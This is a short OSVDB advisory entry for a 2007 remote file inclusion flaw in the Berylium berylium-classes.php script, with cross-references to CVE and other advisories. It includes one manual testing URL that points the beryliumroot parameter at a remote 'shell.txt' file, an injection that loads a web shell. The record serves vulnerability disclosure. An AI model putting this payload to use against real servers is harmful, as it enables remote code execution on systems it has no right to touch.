Berylium berylium-classes.php beryliumroot Variable Remote File Inclusion

2007-05-07T10:28:44
ID OSVDB:35844
Type osvdb
Reporter OSVDB
Modified 2007-05-07T10:28:44

Description

Manual Testing Notes

http://[target]/[berylium2_path]/code/berylium-classes.php?beryliumroot=shell.txt?

References:

Secunia Advisory ID:25164 Other Advisory URL: http://milw0rm.com/exploits/3869 ISS X-Force ID: 34158 FrSIRT Advisory: ADV-2007-1682 CVE-2007-2531 Bugtraq ID: 23882